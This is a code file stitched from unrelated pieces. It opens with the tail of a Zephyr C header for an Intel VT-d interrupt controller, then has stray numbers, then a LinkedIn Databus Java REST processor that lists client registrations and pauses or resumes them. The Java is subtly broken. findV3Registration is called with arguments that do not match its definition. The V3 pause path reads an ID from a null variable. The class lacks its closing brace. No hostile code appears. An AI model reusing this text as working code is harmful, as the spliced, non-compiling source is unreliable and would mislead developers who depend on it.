	int irte_num_used;	/* number of IRTEs currently handed out */
};
/* Per-controller ROM configuration: only the MMIO region descriptor
 * (Zephyr DEVICE_MMIO helper). */
struct vtd_ictl_cfg {
	DEVICE_MMIO_ROM;
};
#endif /* ZEPHYR_DRIVERS_INTERRUPT_CONTROLLER_INTC_INTEL_VTD_H_ */
| 696
|
2,989
|
package com.linkedin.databus.client.request;
/*
*
* Copyright 2013 LinkedIn Corp. All rights reserved
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*
*/
import java.io.IOException;
import java.util.ArrayList;
import java.util.Collection;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
import java.util.TreeMap;
import java.util.Map.Entry;
import java.util.concurrent.ExecutorService;
import org.apache.log4j.Logger;
import com.linkedin.databus.client.DatabusHttpClientImpl;
import com.linkedin.databus.client.DatabusSourcesConnection;
import com.linkedin.databus.client.DbusPartitionInfoImpl;
import com.linkedin.databus.client.monitoring.RegistrationStatsInfo;
import com.linkedin.databus.client.pub.DatabusRegistration;
import com.linkedin.databus.client.pub.DatabusV3MultiPartitionRegistration;
import com.linkedin.databus.client.pub.DatabusV3Registration;
import com.linkedin.databus.client.pub.DbusClusterInfo;
import com.linkedin.databus.client.pub.DbusPartitionInfo;
import com.linkedin.databus.client.pub.RegistrationId;
import com.linkedin.databus.client.pub.RegistrationState;
import com.linkedin.databus.client.registration.DatabusMultiPartitionRegistration;
import com.linkedin.databus.client.registration.DatabusV2ClusterRegistrationImpl;
import com.linkedin.databus.core.DatabusComponentStatus;
import com.linkedin.databus.core.data_model.DatabusSubscription;
import com.linkedin.databus.core.data_model.PhysicalPartition;
import com.linkedin.databus2.core.container.request.AbstractStatsRequestProcessor;
import com.linkedin.databus2.core.container.request.DatabusRequest;
import com.linkedin.databus2.core.container.request.InvalidRequestParamValueException;
import com.linkedin.databus2.core.container.request.RequestProcessingException;
import com.linkedin.databus2.core.filter.DbusKeyCompositeFilterConfig;
/**
*
* Request processor to support REST API for
*
* (a) Listing the registration ids (both V2/V3 top and partition level registrations).
* (b) Inspecting the status of a given registration by id (c) Listing all the client
* clusters (both V2 and V3) registered to the client instance. (d) List all the active
* partitions for a given V2/V3 client cluster. (e) Pause/Resume a given V2/V3
* registration (both top-level and partition (child) level). (f) Pause/Resume all the V2
* and V3 registrations (both top-level and partition (child) level) (g) List all the
* MPRegistrations (V3).
*
* Please note that Top-level registrations are those that were created as a result of one
* of "registerXXX()" calls on databus-client. In the case of multi-partition
* registrations (like MPRegistration, V2/V3 CLB), only the parent registration is
* considered the top-level registration. Per-partition (child) registrations which were
* created as part of partition migration are NOT top-level registrations.
*/
public class ClientStateRequestProcessor extends AbstractStatsRequestProcessor
{
public static final String MODULE =
ClientStateRequestProcessor.class.getName();
public static final Logger LOG =
Logger.getLogger(MODULE);
public static final String COMMAND_NAME = "clientState";
private final DatabusHttpClientImpl _client;
/** All first-level registrations listed **/
private final static String REGISTRATIONS_KEY = "registrations";
/** First-level registration info listed **/
private final static String REGISTRATION_KEY_PREFIX = "registration/";
/** All Client Clusters supported by this client instance **/
private final static String CLIENT_CLUSTERS_KEY = "clientClusters";
/** Partitions supported by this client cluster with their registrations **/
private final static String CLIENT_CLUSTER_KEY =
"clientPartitions/";
/** Registration info supported by this client cluster with their registrations **/
private final static String CLIENT_CLUSTER_PARTITION_REG_KEY =
"clientPartition/";
/** Multi Partition Registrations active in this client instance **/
private final static String MP_REGISTRATIONS_KEY =
"mpRegistrations";
/** Pause all registrations active in this client instance **/
private final static String PAUSE_ALL_REGISTRATIONS =
"registrations/pause";
/** Pause registration identified by the registration id **/
private final static String PAUSE_REGISTRATION =
"registration/pause";
/** Resume all registrations paused in this client instance **/
private final static String RESUME_ALL_REGISTRATIONS =
"registrations/resume";
/** Resume registration identified by the registration id **/
private final static String RESUME_REGISTRATION =
"registration/resume";
  /**
   * @param executorService executor used by the base stats request processor.
   * @param client client instance whose registration state is exposed over REST.
   */
  public ClientStateRequestProcessor(ExecutorService executorService,
                                     DatabusHttpClientImpl client)
  {
    super(COMMAND_NAME, executorService);
    _client = client;
  }
  /**
   * Dispatches the REST request to the handler matching its path category.
   *
   * <p>NOTE: the order of the checks matters — the pause/resume paths
   * ("registration/pause", "registration/resume") must be tested before the
   * generic "registration/" prefix, otherwise they would be swallowed by
   * {@link #processRegistrationInfo(DatabusRequest)}. Likewise the
   * startsWith checks rely on the constants not being prefixes of each other.
   *
   * @return true if the category was recognized and handled, false otherwise.
   */
  @Override
  protected boolean doProcess(String category, DatabusRequest request) throws IOException,
      RequestProcessingException
  {
    boolean success = true;
    if (category.equals(REGISTRATIONS_KEY))
    {
      processRegistrations(request);
    }
    else if (category.startsWith(PAUSE_REGISTRATION))
    {
      pauseResumeRegistration(request, true);
    }
    else if (category.startsWith(RESUME_REGISTRATION))
    {
      pauseResumeRegistration(request, false);
    }
    else if (category.startsWith(REGISTRATION_KEY_PREFIX))
    {
      processRegistrationInfo(request);
    }
    else if (category.startsWith(CLIENT_CLUSTERS_KEY))
    {
      processClusters(request);
    }
    else if (category.startsWith(CLIENT_CLUSTER_KEY))
    {
      processCluster(request);
    }
    else if (category.startsWith(CLIENT_CLUSTER_PARTITION_REG_KEY))
    {
      processPartition(request);
    }
    else if (category.equals(MP_REGISTRATIONS_KEY))
    {
      processMPRegistrations(request);
    }
    else if (category.equals(PAUSE_ALL_REGISTRATIONS))
    {
      pauseAllRegistrations(request);
    }
    else if (category.equals(RESUME_ALL_REGISTRATIONS))
    {
      resumeAllRegistrations(request);
    }
    else
    {
      success = false;
    }
    return success;
  }
  /**
   * Exposes the mapping between an mpRegistration and the ids of its
   * per-partition child registrations (Databus V3 only).
   *
   * @param request DatabusRequest corresponding to the REST call.
   * @throws IOException if unable to write to the output channel.
   * @throws RequestProcessingException if this is not a Databus V3 client.
   */
  private void processMPRegistrations(DatabusRequest request) throws IOException,
      RequestProcessingException
  {
    Map<RegistrationId, DatabusV3Registration> registrationIdMap =
        _client.getRegistrationIdMap();
    if (null == registrationIdMap)
      throw new InvalidRequestParamValueException(request.getName(),
                                                  REGISTRATIONS_KEY,
                                                  "Present only for Databus V3 clients");
    // parent regId -> child regIds; TreeMap keeps the JSON output sorted.
    Map<String, List<String>> ridList = new TreeMap<String, List<String>>();
    for (Map.Entry<RegistrationId, DatabusV3Registration> entry : registrationIdMap.entrySet())
    {
      DatabusV3Registration reg = entry.getValue();
      if (reg instanceof DatabusV3MultiPartitionRegistration)
      {
        Collection<DatabusV3Registration> dvrList =
            ((DatabusV3MultiPartitionRegistration) reg).getPartionRegs().values();
        List<String> mpRegList = new ArrayList<String>();
        for (DatabusV3Registration dvr : dvrList)
        {
          mpRegList.add(dvr.getRegistrationId().getId());
        }
        ridList.put(entry.getKey().getId(), mpRegList);
      }
    }
    writeJsonObjectToResponse(ridList, request);
    return;
  }
  /**
   * Provides an individual registration's details (V2 or V3, top-level or
   * child). Top-level registrations are those created by one of the
   * "registerXXX()" calls on the databus client; per-partition (child)
   * registrations created during partition migration are not top-level.
   *
   * <p>The V2 lookup is attempted first; only if it fails is the name
   * resolved as a V3 registration. The output format differs between V2
   * (the registration object is dumped directly) and V3 (an intermediate
   * RegistrationStatsInfo is emitted) — these are legacy formats that the
   * integration tests depend on.
   *
   * @param request DatabusRequest corresponding to the REST call.
   * @throws IOException if unable to write to the output channel.
   * @throws RequestProcessingException when the registration could not be located.
   */
  private void processRegistrationInfo(DatabusRequest request) throws IOException,
      RequestProcessingException
  {
    boolean found = true;
    // V2 Registration lookup first
    RegistrationStatsInfo regStatsInfo = null;
    try
    {
      DatabusRegistration r = findV2Registration(request, REGISTRATION_KEY_PREFIX);
      writeJsonObjectToResponse(r, request);
    }
    catch (RequestProcessingException ex)
    {
      found = false;
    }
    // V3 Registration lookup if not found
    if (!found)
    {
      // if reg is null, the callee throws an exception.
      DatabusV3Registration reg = findV3Registration(request, REGISTRATION_KEY_PREFIX);
      DatabusSourcesConnection sourcesConn =
          _client.getDatabusSourcesConnection(reg.getRegistrationId().getId());
      regStatsInfo = new RegistrationStatsInfo(reg, sourcesConn);
      writeJsonObjectToResponse(regStatsInfo, request);
    }
  }
  /**
   * Displays all top-level registrations registered to the client (both V2 and
   * V3). Top-level registrations are those created by one of the
   * "registerXXX()" calls on the databus client; in multi-partition setups only
   * the parent registration is top-level — per-partition (child) registrations
   * created during partition migration are not listed.
   *
   * @param request DatabusRequest corresponding to the REST API.
   * @throws IOException when unable to write to the output channel.
   */
  private void processRegistrations(DatabusRequest request) throws IOException
  {
    // regId -> subscriptions; TreeMap keeps the JSON output sorted by id.
    Map<String, Collection<DatabusSubscription>> regIds =
        new TreeMap<String, Collection<DatabusSubscription>>();
    // V2 Registration
    Collection<RegInfo> regs = getAllTopLevelV2Registrations();
    if (null != regs)
    {
      for (RegInfo r : regs)
      {
        regIds.put(r.getRegId().getId(), r.getSubs());
      }
    }
    Map<RegistrationId, DatabusV3Registration> registrationIdMap =
        _client.getRegistrationIdMap();
    // V3 Registration
    if (null != registrationIdMap)
    {
      for (Map.Entry<RegistrationId, DatabusV3Registration> entry : registrationIdMap.entrySet())
      {
        DatabusV3Registration reg = entry.getValue();
        List<DatabusSubscription> dsl = reg.getSubscriptions();
        regIds.put(entry.getKey().getId(), dsl);
      }
    }
    writeJsonObjectToResponse(regIds, request);
  }
/**
*
* Proved list of V2 and V3 Client clusters which are used (registered).
*
* @param request
* DatabusRequest corresponding to the REST call.
* @throws IOException
* when unable to write to output channel.
*/
private void processClusters(DatabusRequest request) throws IOException
{
Map<RegistrationId, DbusClusterInfo> clusters = _client.getAllClientClusters();
writeJsonObjectToResponse(clusters.values(), request);
}
/**
* Provide the list of partitions corresponding to the V2/V3 client cluster.
*
* @param request
* DatabusRequest corresponding to the REST call.
* @throws IOException
* when unable to write to output channel.
* @throws RequestProcessingException
* when cluster not found.
*/
private void processCluster(DatabusRequest request) throws IOException,
RequestProcessingException
{
String category = request.getParams().getProperty(DatabusRequest.PATH_PARAM_NAME);
String clusterName = category.substring(CLIENT_CLUSTER_KEY.length());
List<PartitionInfo> clusters = new ArrayList<PartitionInfo>();
RequestProcessingException rEx = null;
Collection<PartitionInfo> v2Clusters = null;
// Check as if this is V2 Cluster first
boolean found = true;
try
{
v2Clusters = getV2ClusterPartitions(clusterName);
clusters.addAll(v2Clusters);
}
catch (RequestProcessingException ex)
{
found = false;
rEx = ex;
}
// Try as V3 cluster if it is not V2.
if (!found)
{
Collection<PartitionInfo> v3Clusters = null;
try
{
v3Clusters = getV3ClusterPartitions(clusterName);
clusters.addAll(v3Clusters);
found = true;
}
catch (RequestProcessingException ex)
{
found = false;
rEx = ex;
}
}
if (!found)
throw rEx;
writeJsonObjectToResponse(clusters, request);
}
/**
* Provide a partition information belonging to a V2/V3 client cluster and hosted in
* this client instance
*
* @param request
* DatabusRequest corresponding to the REST call.
* @throws IOException
* when unable to write to output channel.
* @throws RequestProcessingException
* when cluster not found or when partition is not hosted in this instance
*/
private void processPartition(DatabusRequest request) throws IOException,
RequestProcessingException
{
String category = request.getParams().getProperty(DatabusRequest.PATH_PARAM_NAME);
String clusterPartitionName =
category.substring(CLIENT_CLUSTER_PARTITION_REG_KEY.length());
/**
* API: curl
* http://<HOST>:<PORT>/clientState/clientPartition/<CLUSTER_NAME>/<PARTITION> curl
* http://<HOST>:<PORT>/clientState/clientPartition/<CLUSTER_NAME>:<PARTITION>
*/
String[] toks = clusterPartitionName.split("[:/]");
if (toks.length != 2)
throw new RequestProcessingException("Cluster and partition info are expected to be in pattern = <cluster>[/:]<partition> but was "
+ clusterPartitionName);
RegInfo reg = null;
boolean found = true;
// Try as a V2 Partition
try
{
reg = getV2PartitionRegistration(toks[0], new Long(toks[1]));
}
catch (RequestProcessingException ex)
{
found = false;
}
// If not found, try as V3
if (!found)
{
reg = getV3PartitionRegistration(toks[0], new Long(toks[1]));
}
writeJsonObjectToResponse(reg, request);
}
private DatabusV2ClusterRegistrationImpl getV2ClusterRegistration(String clusterName) throws RequestProcessingException
{
Collection<DatabusMultiPartitionRegistration> regs =
_client.getAllClientClusterRegistrations();
for (DatabusMultiPartitionRegistration reg : regs)
{
if (reg instanceof DatabusV2ClusterRegistrationImpl)
{
DatabusV2ClusterRegistrationImpl r = (DatabusV2ClusterRegistrationImpl) reg;
if (clusterName.equals(r.getClusterInfo().getName()))
return r;
}
}
throw new RequestProcessingException("No Registration found for cluster ("
+ clusterName + ") !!");
}
private DatabusV3MultiPartitionRegistration getV3ClusterRegistration(String clusterName) throws RequestProcessingException
{
// There is a one-to-one mapping between clusterName to
// DatabusV3MultiPartitionRegistration
Map<RegistrationId, DbusClusterInfo> clusterMap = _client.getAllClientClusters();
for (Entry<RegistrationId, DbusClusterInfo> e : clusterMap.entrySet())
{
if (clusterName.equalsIgnoreCase(e.getValue().getName()))
{
DatabusV3Registration reg = _client.getRegistration(e.getKey());
if (reg instanceof DatabusV3MultiPartitionRegistration)
{
return (DatabusV3MultiPartitionRegistration) reg;
}
break;
}
}
throw new RequestProcessingException("No Registration found for cluster ("
+ clusterName + ") !!");
}
/**
* Pause or resume a V2 or V3 registration. The registration can be a top-level or
* child-level registration Top-level registrations are those that were created as a
* result of one of "registerXXX()" calls on databus-client. In the case of
* multi-partition registrations (like MPRegistration, V2/V3 CLB), only the parent
* registration is considered the top-level registration. Per-partition (child)
* registrations which were created as part of partition migration are NOT top-level
* registrations.
*
* @param request
* Databus request corresponding to the REST call.
* @param doPause
* true if wanted to pause, false if to be resumed
* @throws IOException
* if unable to write output to channel
* @throws RequestProcessingException
* when registration could not be found.
*/
private void pauseResumeRegistration(DatabusRequest request, boolean doPause) throws IOException,
RequestProcessingException
{
DatabusRegistration r = null;
DatabusV3Registration r2 = null;
boolean found = true;
boolean isRunning = false;
boolean isPaused = false;
boolean isSuspended = false;
RegistrationId regId = null;
RequestProcessingException rEx = null;
RegStatePair regStatePair = null;
try
{
r = findV2Registration(request, PAUSE_REGISTRATION);
isRunning = r.getState().isRunning();
isPaused = (r.getState() == DatabusRegistration.RegistrationState.PAUSED);
isSuspended =
(r.getState() == DatabusRegistration.RegistrationState.SUSPENDED_ON_ERROR);
regId = r.getRegistrationId();
}
catch (RequestProcessingException ex)
{
found = false;
rEx = ex;
}
if (!found)
{
try
{
r2 = findV3Registration(request, PAUSE_REGISTRATION);
found = true;
isRunning = r2.getState().isRunning();
isPaused = (r2.getState() == RegistrationState.PAUSED);
isSuspended = (r2.getState() == RegistrationState.SUSPENDED_ON_ERROR);
regId = r.getRegistrationId();
}
catch (RequestProcessingException ex)
{
found = false;
rEx = ex;
}
}
if (!found)
throw rEx;
LOG.info("REST call to pause registration : " + regId);
if (isRunning)
{
if (doPause)
{
if (!isPaused)
{
if (null != r)
{
r.pause();
regStatePair = new RegStatePair(r.getState(), r.getRegistrationId());
}
else
{
r2.pause();
regStatePair = new RegStatePair(r2.getState().name(), r2.getRegistrationId());
}
}
}
else
{
if (isPaused || isSuspended)
{
if (null != r)
{
r.resume();
regStatePair = new RegStatePair(r.getState(), r.getRegistrationId());
}
else
{
r2.resume();
regStatePair = new RegStatePair(r2.getState().name(), r2.getRegistrationId());
}
}
}
}
writeJsonObjectToResponse(regStatePair, request);
}
/**
* Pause all registrations (both V2 and V3 in this client instance) which are in running
* state.
*
* @param request
* DatabusRequest corresponding to the REST call.
* @throws IOException
* when unable to write the output.
*/
private void pauseAllRegistrations(DatabusRequest request) throws IOException
{
LOG.info("REST call to pause all registrations");
/**
* Get the top-level V2 registrations and pause them. The child-level registrations by
* the top-level registrations that aggregates them.
*/
Collection<DatabusRegistration> regs = _client.getAllRegistrations();
if (null != regs)
{
for (DatabusRegistration r : regs)
{
if (r.getState().isRunning())
{
if (r.getState() != DatabusRegistration.RegistrationState.PAUSED)
r.pause();
}
}
}
/**
* Get the top-level V3 registrations and pause them. The child-level registrations by
* the top-level registrations that aggregates them.
*/
Map<RegistrationId, DatabusV3Registration> regMap = _client.getRegistrationIdMap();
Collection<RegInfo> topLevelRegs = getAllTopLevelV3Registrations();
/**
* Important Note: There is an important implementation difference on which
* registrations are stored in the global registration data-structure maintained by
* the client (DatabusHttp[V3]ClientImpls) between V2 and V3.
*
* 1. In the case of V2, only top-level registrations are stored in the global
* data-structure (DatabusHttpClientImpl.regList 2. In the case of V3, all
* registrations are stored in the global data-structure.
*
* In the case of V3, this is needed so that all registrations can act on the relay
* external view change. This can be refactored in the future by moving the
* relay-external view change to registration impl ( reduce the complexity in
* ClientImpl ). The V2 implementation did not have this logic and was following a
* more intuitive structure of preserving the hierarchy.
*/
if ((null != regMap) && (null != topLevelRegs))
{
for (RegInfo reg : topLevelRegs)
{
DatabusV3Registration r = regMap.get(reg.getRegId());
if (r.getState().isRunning())
{
if (r.getState() != RegistrationState.PAUSED)
r.pause();
}
}
}
writeJsonObjectToResponse(getAllTopLevelRegStates(), request);
}
/**
* Resume all registrations paused or suspended (both V2 and V3 in this client instance)
*
* @param request
* DatabusRequest corresponding to the REST call.
* @throws IOException
* when unable to write the output.
*/
private void resumeAllRegistrations(DatabusRequest request) throws IOException
{
LOG.info("REST call to resume all registrations");
/**
* Get the top-level V2 registrations and pause them. The child-level registrations by
* the top-level registrations that aggregates them.
*/
Collection<DatabusRegistration> regs = _client.getAllRegistrations();
if (null != regs)
{
for (DatabusRegistration r : regs)
{
if (r.getState().isRunning())
{
if ((r.getState() == DatabusRegistration.RegistrationState.PAUSED)
|| (r.getState() == DatabusRegistration.RegistrationState.SUSPENDED_ON_ERROR))
r.resume();
}
}
}
/**
* Get the top-level V3 registrations and pause them. The child-level registrations by
* the top-level registrations that aggregates them.
*/
Map<RegistrationId, DatabusV3Registration> regMap = _client.getRegistrationIdMap();
Collection<RegInfo> topLevelRegs = getAllTopLevelV3Registrations();
/**
* Important Note: There is an important implementation difference on which
* registrations are stored in the global registration data-structure maintained by
* the client (DatabusHttp[V3]ClientImpls) between V2 and V3.
*
* 1. In the case of V2, only top-level registrations are stored in the global
* data-structure (DatabusHttpClientImpl.regList 2. In the case of V3, all
* registrations are stored in the global data-structure.
*
* In the case of V3, this is needed so that all registrations can act on the relay
* external view change. This can be refactored in the future by moving the
* relay-external view change to registration impl ( reduce the complexity in
* ClientImpl ). The V2 implementation did not have this logic and was following a
* more intuitive structure of preserving the hierarchy.
*/
if ((null != regMap) && (null != topLevelRegs))
{
for (RegInfo reg : topLevelRegs)
{
DatabusV3Registration r = regMap.get(reg.getRegId());
if (r.getState().isRunning())
{
if ((r.getState() == RegistrationState.PAUSED)
|| (r.getState() == RegistrationState.SUSPENDED_ON_ERROR))
r.resume();
}
}
}
writeJsonObjectToResponse(getAllTopLevelRegStates(), request);
}
/**
* Generate regStatePair for all the top-level registrations (both V2 and V3).
*
* @return
*/
private Collection<RegStatePair> getAllTopLevelRegStates()
{
List<RegStatePair> regList = new ArrayList<RegStatePair>();
Collection<RegInfo> regs = getAllTopLevelRegistrations();
for (RegInfo reg : regs)
{
regList.add(new RegStatePair(reg.getState(), reg.getRegId()));
}
return regList;
}
/**
* Returns all the top-level registrations (both V2 and V3). Top-level registrations are
* those that were created as a result of one of "registerXXX()" calls on
* databus-client. In the case of multi-partition registrations (like MPRegistration,
* V2/V3 CLB), only the parent registration is considered the top-level registration.
* Per-partition (child) registrations which were created as part of partition migration
* are NOT top-level registrations.
*
* @return collection of top-level registrations (V2/V3)
*/
private Collection<RegInfo> getAllTopLevelRegistrations()
{
List<RegInfo> regList = new ArrayList<RegInfo>();
regList.addAll(getAllTopLevelV2Registrations());
regList.addAll(getAllTopLevelV3Registrations());
return regList;
}
/**
* Returns all the top-level V3 registrations. Top-level registrations are those that
* were created as a result of one of "registerXXX()" calls on databus-client. In the
* case of multi-partition registrations (like MPRegistration, V3 CLB), only the parent
* registration is considered the top-level registration. Per-partition (child)
* registrations which were created as part of partition migration are NOT top-level
* registrations.
*
* @return collection of top-level registrations (V3)
*/
private Collection<RegInfo> getAllTopLevelV3Registrations()
{
/**
* Important Note: There is an important implementation difference on which
* registrations are stored in the global registration data-structure maintained by
* the client (DatabusHttp[V3]ClientImpls) between V2 and V3.
*
* 1. In the case of V2, only top-level registrations are stored in the global
* data-structure (DatabusHttpClientImpl.regList 2. In the case of V3, all
* registrations are stored in the global data-structure.
*
* In the case of V3, this is needed so that all registrations can act on the relay
* external view change. This can be refactored in the future by moving the
* relay-external view change to registration impl ( reduce the complexity in
* ClientImpl ). The V2 implementation did not have this logic and was following a
* more intuitive structure of preserving the hierarchy.
*/
Map<RegistrationId, RegInfo> regListMap = new HashMap<RegistrationId, RegInfo>();
/**
* The _client.getRegistrationIdMap() has all registrations in one place. Top-Level
* Registrations = Only those registrations whose getParent() == null.
*/
Map<RegistrationId, DatabusV3Registration> regMap = _client.getRegistrationIdMap();
for (Entry<RegistrationId, DatabusV3Registration> e : regMap.entrySet())
{
RegInfo regInfo = null;
DatabusV3Registration r = e.getValue();
// If not top-level, skip
if (null != r.getParentRegistration())
{
continue;
}
Map<DbusPartitionInfo, RegInfo> childR = null;
if (r instanceof DatabusV3MultiPartitionRegistration)
{
// ass the children regs to parent.
Map<PhysicalPartition, DatabusV3Registration> childRegs =
((DatabusV3MultiPartitionRegistration) r).getPartionRegs();
childR = new HashMap<DbusPartitionInfo, RegInfo>();
for (Entry<PhysicalPartition, DatabusV3Registration> e2 : childRegs.entrySet())
{
childR.put(new DbusPartitionInfoImpl(e2.getKey().getId()),
new RegInfo(e.getValue().getState().name(),
e.getValue().getRegistrationId(),
e.getValue().getStatus(),
null,
e.getValue().getSubscriptions()));
}
}
regInfo =
new RegInfo(r.getState().name(),
r.getRegistrationId(),
r.getStatus(),
null,
r.getSubscriptions(),
true,
childR);
regListMap.put(e.getKey(), regInfo);
}
return regListMap.values();
}
/**
* Returns all the top-level V2 registrations. Top-level registrations are those that
* were created as a result of one of "registerXXX()" calls on databus-client. In the
* case of multi-partition registrations (like V2 CLB), only the parent registration is
* considered the top-level registration. Per-partition (child) registrations which were
* created as part of partition migration are NOT top-level registrations.
*
* @return collection of top-level registrations (V2)
*/
private Collection<RegInfo> getAllTopLevelV2Registrations()
{
List<RegInfo> regList = new ArrayList<RegInfo>();
Collection<DatabusRegistration> regs = _client.getAllRegistrations();
for (DatabusRegistration r : regs)
{
RegInfo regInfo = null;
if (r instanceof DatabusMultiPartitionRegistration)
{
Map<DbusPartitionInfo, DatabusRegistration> childRegs =
((DatabusMultiPartitionRegistration) r).getPartitionRegs();
Map<DbusPartitionInfo, RegInfo> childR =
new HashMap<DbusPartitionInfo, RegInfo>();
for (Entry<DbusPartitionInfo, DatabusRegistration> e : childRegs.entrySet())
{
childR.put(e.getKey(), new RegInfo(e.getValue().getState().name(),
e.getValue().getRegistrationId(),
e.getValue().getStatus(),
e.getValue().getFilterConfig(),
e.getValue().getSubscriptions()));
}
regInfo =
new RegInfo(r.getState().name(),
r.getRegistrationId(),
r.getStatus(),
r.getFilterConfig(),
r.getSubscriptions(),
true,
childR);
}
else
{
regInfo =
new RegInfo(r.getState().name(),
r.getRegistrationId(),
r.getStatus(),
r.getFilterConfig(),
r.getSubscriptions());
}
regList.add(regInfo);
}
return regList;
}
/**
* Get the list of partitions hosted by this client for the V2 cluster.
*
* @param cluster
* V2 CLuster for which we need to find out the partitions.
* @return
* @throws RequestProcessingException
* when unable to find the cluster.
*/
private Collection<PartitionInfo> getV2ClusterPartitions(String cluster) throws RequestProcessingException
{
DatabusV2ClusterRegistrationImpl reg = getV2ClusterRegistration(cluster);
List<PartitionInfo> partitions = new ArrayList<PartitionInfo>();
Map<DbusPartitionInfo, DatabusRegistration> regMap = reg.getPartitionRegs();
for (Entry<DbusPartitionInfo, DatabusRegistration> e : regMap.entrySet())
{
PartitionInfo p =
new PartitionInfo(e.getKey().getPartitionId(), e.getValue().getRegistrationId());
partitions.add(p);
}
return partitions;
}
/**
* Get the list of partitions hosted by this client for the V3 cluster.
*
* @param cluster
* V3 CLuster for which we need to find out the partitions.
* @return
* @throws RequestProcessingException
* when unable to find the cluster.
*/
private Collection<PartitionInfo> getV3ClusterPartitions(String cluster) throws RequestProcessingException
{
DatabusV3MultiPartitionRegistration reg = getV3ClusterRegistration(cluster);
List<PartitionInfo> partitions = new ArrayList<PartitionInfo>();
Map<PhysicalPartition, DatabusV3Registration> regMap = reg.getPartionRegs();
for (Entry<PhysicalPartition, DatabusV3Registration> e : regMap.entrySet())
{
PartitionInfo p =
new PartitionInfo(e.getKey().getId(), e.getValue().getRegistrationId());
partitions.add(p);
}
return partitions;
}
/**
* Helper method to get partition registration information for a given V2 Cluster
* partition
*
* @param cluster
* V2 Cluster
* @param partition
* Partition in the cluster.
* @return
* @throws RequestProcessingException
* When cluster or partition is not hosted in this instance.
*/
private RegInfo getV2PartitionRegistration(String cluster, long partition) throws RequestProcessingException
{
DatabusV2ClusterRegistrationImpl reg = getV2ClusterRegistration(cluster);
DbusPartitionInfo p = new DbusPartitionInfoImpl(partition);
DatabusRegistration r = reg.getPartitionRegs().get(p);
if (null == r)
throw new RequestProcessingException("Partition(" + partition + ") for cluster ("
+ cluster + ") not found !!");
return new RegInfo(r.getState().name(),
r.getRegistrationId(),
r.getStatus(),
r.getFilterConfig(),
r.getSubscriptions());
}
/**
* Helper method to get partition registration information for a given V3 Cluster
* partition
*
* @param cluster
* V3 Cluster
* @param partition
* Partition in the cluster.
* @return
* @throws RequestProcessingException
* When cluster or partition is not hosted in this instance.
*/
private RegInfo getV3PartitionRegistration(String cluster, long partition) throws RequestProcessingException
{
DatabusV3MultiPartitionRegistration reg = getV3ClusterRegistration(cluster);
for (Entry<PhysicalPartition, DatabusV3Registration> e : reg.getPartionRegs()
.entrySet())
{
if (partition == e.getKey().getId())
{
DatabusV3Registration r = e.getValue();
return new RegInfo(r.getState().name(),
r.getRegistrationId(),
r.getStatus(),
null,
r.getSubscriptions());
}
}
throw new RequestProcessingException("Partition(" + partition + ") for cluster ("
+ cluster + ") not found !!");
}
/**
* Helper method to locate a databus V2 registration by its registration id. This method
* can locate both top-level (registered by one of _dbusClient.registerXXX()) and
* individual-partition (child) registration that are aggregated inside a top-level
* MultiPartition registration.
*
* Please note that this can traverse the registration tree which is 1 level deep. In
* other words, it will not work when we have MultiPartition registrations aggregated
* inside another MultiPartition registrations.
*
* @param regId
* Registration Id to be located
* @param request
* Databus Request corresponding to the REST call.
* @return
* @throws RequestProcessingException
* when the registration is not found.
*/
private DatabusRegistration findV2Registration(DatabusRequest request, String prefix) throws RequestProcessingException
{
String category = request.getParams().getProperty(DatabusRequest.PATH_PARAM_NAME);
String registrationIdStr = category.substring(prefix.length());
RegistrationId regId = new RegistrationId(registrationIdStr);
Collection<DatabusRegistration> regs = _client.getAllRegistrations();
if (null != regs)
{
for (DatabusRegistration r : regs)
{
if (regId.equals(r.getRegistrationId()))
{
return r;
}
/**
* Important Note: There is an important implementation difference on which
* registrations are stored in the global registration data-structure maintained
* by the client (DatabusHttp[V3]ClientImpls) between V2 and V3.
*
* 1. In the case of V2, only top-level registrations are stored in the global
* data-structure (DatabusHttpClientImpl.regList 2. In the case of V3, all
* registrations are stored in the global data-structure.
*
* In the case of V3, this is needed so that all registrations can act on the
* relay external view change. This can be refactored in the future by moving the
* relay-external view change to registration impl ( reduce the complexity in
* ClientImpl ). The V2 implementation did not have this logic and was following a
* more intuitive structure of preserving the hierarchy. The below code handles
* the discrepancy for V2.
*/
if (r instanceof DatabusMultiPartitionRegistration)
{
Map<DbusPartitionInfo, DatabusRegistration> childRegs =
((DatabusMultiPartitionRegistration) r).getPartitionRegs();
for (Entry<DbusPartitionInfo, DatabusRegistration> e : childRegs.entrySet())
{
if (regId.equals(e.getValue().getRegistrationId()))
{
return e.getValue();
}
}
}
}
}
throw new RequestProcessingException("Unable to find registration (" + regId + ") ");
}
/**
* Helper method to locate a databus V3 registration by its registration id. This method
* can locate both top-level (registered by one of _dbusClient.registerXXX()) and
* individual-partition (child) registration that are aggregated inside a top-level
* MultiPartition registration.
*
* Please note that this can traverse the registration tree which is 1 level deep. In
* other words, it will not work when we have MultiPartition registrations aggregated
* inside another MultiPartition registrations.
*
* @param regId
* Registration Id to be located
* @param request
* Databus Request corresponding to the REST call.
* @return
* @throws RequestProcessingException
* when the registration is not found.
*/
private DatabusV3Registration findV3Registration(RegistrationId regId,
DatabusRequest request) throws RequestProcessingException
{
Map<RegistrationId, DatabusV3Registration> regIdMap = _client.getRegistrationIdMap();
if (null == regIdMap)
{
throw new InvalidRequestParamValueException(request.getName(),
REGISTRATION_KEY_PREFIX,
"No registrations available !! ");
}
/**
* Important Note: There is an important implementation difference on which
* registrations are stored in the global registration data-structure maintained by
* the client (DatabusHttp[V3]ClientImpls) between V2 and V3.
*
* 1. In the case of V2, only top-level registrations are stored in the global
* data-structure (DatabusHttpClientImpl.regList 2. In the case of V3, all
* registrations are stored in the global data-structure.
*
* In the case of V3, this is needed so that all registrations can act on the relay
* external view change. This can be refactored in the future by moving the
* relay-external view change to registration impl ( reduce the complexity in
* ClientImpl ). The V2 implementation did not have this logic and was following a
* more intuitive structure of preserving the hierarchy.
*/
for (DatabusV3Registration r : regIdMap.values())
{
if (regId.equals(r.getRegistrationId()))
{
return r;
}
}
throw new InvalidRequestParamValueException(request.getName(),
REGISTRATION_KEY_PREFIX,
"Registration with id " + regId
+ " not present !!");
}
